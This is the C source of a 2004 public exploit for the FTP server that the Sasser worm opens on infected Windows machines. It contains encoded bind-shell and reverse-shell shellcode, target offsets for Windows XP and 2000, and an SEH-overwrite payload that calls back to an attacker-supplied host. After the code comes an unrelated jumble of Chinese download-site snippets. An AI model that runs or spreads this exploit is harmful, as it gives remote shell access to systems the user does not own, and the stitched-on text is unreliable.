/*
_________ / ___// ____/ ____/
/ ___/ __ \\__ \/ __/ / /
/ / / /_/ /__/ / /___/ /___
/_/ \____/____/_____/\____/
- ROMANIAN SECURITY RESEARCH 2004 -
sasser v[a-e] exploit (of its ftpd server)
exploit version 1.4, public
author: mandragore
date: Mon May 10 16:13:31 2004
vuln type: SEH ptr overwriting
greets: rosecurity team
discovery: edcba
note: sasser.e has its ftpd on port 1023
update: offsets
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define NORM "\033[00;00m"
#define GREEN "\033[01;32m"
#define YELL "\033[01;33m"
#define RED "\033[01;31m"
#define BANNER GREEN "[%%] " YELL "mandragore's sploit v1.4 for " RED "sasser.x" NORM
#define fatal(x) { perror(x); exit(1); }
#define default_port 5554
struct { char *os; long goreg; long gpa; long lla;}
targets[] = {
// { "os", pop pop ret, GetProcAd ptr, LoadLib ptr },
{ "wXP SP1 many", 0x77BEEB23, 0x77be10CC, 0x77be10D0 }, // msvcrt.dll's
{ "wXP SP1 most others", 0x77C1C0BD, 0x77C110CC, 0x77c110D0 },
{ "w2k SP4 many", 0x7801D081, 0x780320cc, 0x780320d0 },
}, tsz;
unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xDD,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0x36,
0xDB,0xDE,0xDE,0xDE,0xBC,0xB7,0xB0,0xBA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,
0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xB2,0xB7,0xAD,0xAA,0xBB,0xB0,0xDE,0x89,0x21,0xC8,
0x21,0x0E,0xB4,0xDE,0x8A,0x8D,0x36,0xD9,0xDE,0xDE,0xDE,0xBF,0xBD,0xBD,0xBB,0xAE,
0xAA,0xDE,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,0x87,0x55,0x22,
0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,
0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,
0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,
0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,
0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,
0xC8,0x21,0x0E
};
unsigned char rsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB6,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0xB9,0x51,0xD8,0xDE,0xDE,0x60,0xDE,0xFE,0x9E,
0xDE,0xB6,0xED,0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,
0x9E,0xDE,0x49,0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0x36,0xD5,0xDE,0xDE,
0xDE,0x89,0x8D,0x9F,0x8D,0xB1,0xBD,0xB5,0xBB,0xAA,0x9F,0xDE,0x89,0x21,0xC8,0x21,
0x0E,0x4D,0xB6,0xA1,0xDE,0xDE,0xDF,0xB6,0xDC,0xDE,0xCA,0x6A,0x55,0x1A,0xB4,0xCE,
0x8E,0x8D,0x36,0xD6,0xDE,0xDE,0xDE,0xBD,0xB1,0xB0,0xB0,0xBB,0xBD,0xAA,0xDE,0x89,
0x21,0xC8,0x21,0x0E,0xB4,0xCE,0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,
0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,
0xBA,0xDE,0x8E,0x36,0xD1,0xDE,0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,
0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,
0xDE,0x5D,0x19,0xE6,0x4D,0x75,0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,
0x55,0x9E,0xC2,0x55,0xDE,0x21,0xAE,0xD6,0x21,0xC8,0x21,0x0E
};
char verbose=0;
void setoff(long GPA, long LLA) {
int gpa=GPA^0xdededede, lla=LLA^0xdededede;
memcpy(bsh+0x1d,&gpa,4);
memcpy(bsh+0x2e,&lla,4);
memcpy(rsh+0x1d,&gpa,4);
memcpy(rsh+0x2e,&lla,4);
}
void usage(char *argv0) {
int i;
printf("%s -d <host/ip> [opts]\n\n",argv0);
printf("Options:\n");
printf(" -h undocumented\n");
printf(" -p <port> to connect to [default: %u]\n",default_port);
printf(" -s <'bind'/'rev'> shellcode type [default: bind]\n");
printf(" -P <port> for the shellcode [default: 5300]\n");
printf(" -H <host/ip> for the reverse shellcode\n");
printf(" -L setup the listener for the reverse shell\n");
printf(" -t <target type> [default 0]; choose below\n\n");
printf("Types:\n");
for(i = 0; i < sizeof(targets)/sizeof(tsz); i++)
printf(" %d %s\t[0x%.8x]\n", i, targets[i].os, targets[i].goreg);
exit(1);
}
void shell(int s) {
char buff[4096];
int retval;
fd_set fds;
printf("[+] connected!\n\n");
for (;;) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(s,&fds);
if (select(s+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select()");
if (FD_ISSET(0,&fds)) {
if ((retval = read(1,buff,4096)) < 1)
fatal("[-] shell.recv(stdin)");
send(s,buff,retval,0);
}
if (FD_ISSET(s,&fds)) {
if ((retval = recv(s,buff,4096,0)) < 1)
fatal("[-] shell.recv(socket)");
write(1,buff,retval);
}
}
}
void callback(short port) {
struct sockaddr_in sin;
int s,slen=16;
sin.sin_family = 2;
sin.sin_addr.s_addr = 0;
sin.sin_port = htons(port);
s=socket(2,1,6);
if ( bind(s,(struct sockaddr *)&sin, 16) ) {
kill(getppid(),SIGKILL);
fatal("[-] shell.bind");
}
listen(s,1);
s=accept(s,(struct sockaddr *)&sin,&slen);
shell(s);
printf("crap\n");
}
int main(int argc, char **argv, char **env) {
struct sockaddr_in sin;
struct hostent *he;
char *host; int port=default_port;
char *Host; int Port=5300; char bindopt=1;
int i,s,pid=0,rip;
char *buff;
int type=0;
char *jmp[]={"\xeb\x06","\xe9\x13\xfc\xff\xff"};
printf(BANNER "\n");
if (argc==1)
usage(argv[0]);
for (i=1;i<argc;i+=2) {
if (strlen(argv[i]) != 2)
usage(argv[0]);
switch(argv[i][1]) {
case 't':
type=atoi(argv[i+1]);
break;
case 'd':
host=argv[i+1];
break;
case 'p':
port=atoi(argv[i+1])?:default_port;
break;
case 's':
if (strstr(argv[i+1],"rev"))
bindopt=0;
break;
case 'H':
Host=argv[i+1];
break;
case 'P':
Port=atoi(argv[i+1])?:5300;
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
memcpy(bsh+0x57,&Port,2);
memcpy(rsh+0x5a,&Port,2);
Port=Port ^ 0xdede;
Port=(Port & 0xff) << 8 | Port >>8;
break;
case 'L':
pid++; i--;
break;
case 'v':
verbose++; i--;
break;
case 'h':
usage(argv[0]);
default:
usage(argv[0]);
}
}
if (verbose)
printf("verbose!\n");
if ((he=gethostbyname(host))==NULL)
fatal("[-] gethostbyname()");
sin.sin_family = 2;
sin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);
sin.sin_port = htons(port);
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);
if (bindopt)
printf("[.] will try to put a bindshell on port %d.\n",Port);
else {
if ((he=gethostbyname(Host))==NULL)
fatal("[-] gethostbyname() for -H");
rip=*((long *)he->h_addr_list[0]);
rip=rip^0xdededede;
memcpy(rsh+0x53,&rip,4);
if (pid) {
printf("[.] setting up a listener on port %d.\n",Port);
pid=fork();
switch (pid) { case 0: callback(Port); }
} else
printf("[.] you should have a listener on %s:%d.\n",inet_ntoa(*((struct in_addr
*)he->h_addr_list[0])),Port);
}
printf("[.] using type '%s'\n",targets[type].os);
// -------------------- core
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0) {
if (pid) kill(pid,SIGKILL);
fatal("[-] connect()");
}
printf("[+] connected, sending exploit\n");
buff=(char *)malloc(4096);
bzero(buff,4096);
sprintf(buff,"USER x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
sprintf(buff,"PASS x\n");
send(s,buff,strlen(buff),0);
recv(s,buff,4095,0);
memset(buff+0000,0x90,2000);
strncpy(buff,"PORT ",5);
strcat(buff,"\x0a");
memcpy(buff+272,jmp[0],2);
memcpy(buff+276,&targets[type].goreg,4);
memcpy(buff+280,jmp[1],5);
setoff(targets[type].gpa, targets[type].lla);
if (bindopt)
memcpy(buff+300,&bsh,strlen(bsh));
else
memcpy(buff+300,&rsh,strlen(rsh));
send(s,buff,strlen(buff),0);
free(buff);
close(s);
// -------------------- end of core
if (bindopt) {
sin.sin_port = htons(Port);
sleep(1);
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0)
fatal("[-] exploit most likely failed");
shell(s);
}
if (pid) wait(&pid);
exit(0);
}
分享到:
相关推荐
震荡波溢出工具_Sasser Worm ftpd Exploit震荡波溢出工具_Sasser Worm ftpd Exploit震荡波溢出工具_Sasser Worm ftpd Exploit
3.2.2 示例二:Worm.Sasser 18 3.2.3 示例三:Worm.SQLexp.376 19 3.2.4 示例四:Worm_Bagle.BE 20 3.2.5 示例五:Worm.MyDoom 21 3.2.6 示例六:Code Red & Code Red II 23 3.2.7 示例七:Worm.Nimda 24 4. ...
5554端口:在今年4月30日就报道出现了一种针对微软lsass服务的新蠕虫病毒——震荡波(Worm.Sasser),该病毒可以利用TCP 5554端口开启一个FTP服务,主要被用于病毒的传播。 5632端口:5632端口是被大家所熟悉的远程...
FxSasser 网络安全工具
emphasis on internal orientation,most quality tools were restricted to the dealing of internal process and product improvements.Therefore,managers have noticed that the voice and demand of customers ...
《计算机应用基础》大作业 选题: 从5月1日开始,一种被命名为"震荡波"(英文名Worm.Sasser)的病毒通过国际互 联网在全球范围内迅速传播,给相关单位和个人的业务造成了严重影响,并造成巨大经 济损失, 该病毒在...
iTerm 的恐慌调色板 来自 Panic 自己的终端颜色主题的墨水! 下载文件,双击安装。 Sublime Text 的恐慌调色板 受到由编写的的 Panic Palette 的启发。 要安装,请复制到/Users/YourUser/Library/Application ...
本文阐述一种多级分布式安全管理系统(MD-SMS Multilevel and Distributed Security Management System),首先描述其体系结构,然后讨论三个关键问题的解决:设备建模、通信机制和协同处理,最后以Worm_Sasser蠕虫...
Day 0 Time To Patch 28 18 1 Day Zotob (2005) Days Sasser (2004) __ 发布补丁 HP服务器全文共22页,当前为第2页。 3 什么是〝Zero-day〞要挟? Zero-day要挟就是指曾经发现了系统或软件的破绽,但是目前没有处置...
用户如果在自己的计算机中发现以上全部或部分现象,则很有可能中了Bride(Worm.bride)病毒,请用户立刻用手中的杀毒软件进行清除。 2、使系统变慢的阿芙伦病毒 病毒类型:蠕虫病毒 发作时间:随机 传播...
提供给人自动即时的病毒查找及阻止功能,像 Sasser“震荡波”之类的突发作剧烈病毒,是怎么也逃不过 Cyber-Defender 的法眼的
软件英文名:Microsoft Windows Malicious Software Removal Tool它能够检查 Windows XP、Windows 2000 及 Windows Server 2003 计算机是否受到了各种特定的和流行的恶意软件的感染(包括 Blaster、Sasser 和 Mydoom)...
恶意程序(rogue program)属于比较特别的主动攻击,它对网络安全的危害较大,特别是计算机病毒(c omputer virus)、计算机蠕虫(computer worm)、特洛伊木马(Trojan horse)、逻辑炸弹(logic bomb)[[iii]]。...
液体计算器LiquidCalc(液体计算器)是一个python程序,用于为简单的vaping液体生成混合量。聊天如果您有任何想法或问题,可以加入项目频道#...执照版权所有:copyright:2020 Michael Sasser 。 根据GPLv3许可证发布。
当设定为[Enabled](启动)时,这个项目在系统电源开启之后,可加速POST(Power On Self Test)的程序。BIOS会在POST过程当中缩短或是跳过一些检查项目,从而加速启动等待的时间! Hard Disk Boot Priority(硬盘...
传统的边界保护方案针对来自外部的威胁,在网络边界上部署防火墙、入侵检测等安全产品,对于内部的终端等带来的蠕虫问题无法解决.SQL slammer、MSRPC、Welchia、Sasser等病毒证明,蠕虫威力足以破坏整个网络的可用性...
Microsoft Windows 恶意软件删除工具可以检查 Windows Vista, Windows XP、Windows 2000 和 Windows Server 2003 计算机是否受到特殊流行的恶意软件(包括 Blaster、Sasser 和 Mydoom)的感染,并帮助删除感染。...
它能够检查 Windows XP、Windows 2000 及 Windows Server 2003 计算机是否受到了各种特定的和流行的恶意软件的感染(包括 Blaster、Sasser 和 Mydoom),并帮助删除感染。完成检测和删除过程后,该工具将显示一个报告...
jQuery 是非常流行的JS框架,其...几天前,John重写了Cabel Sasser的FancyZoom,在Prototype和Scriptaculous程序库上。我将它引入到jQuery,并做了一些改进。 View Live Demo 2. Lightbox2 支持所有浏览器的简单易用
目录开发者名称电子邮件Github 领英Chomie Usaneerungrueng 泰勒·蒂博(Tyler Thibault) 丹尼尔·萨瑟(Daniel Sasser) desasser79@gmail.com 埃里亚斯·卡拉古(Elias Calagiu) eliasc81@gmail.com 特征响应式...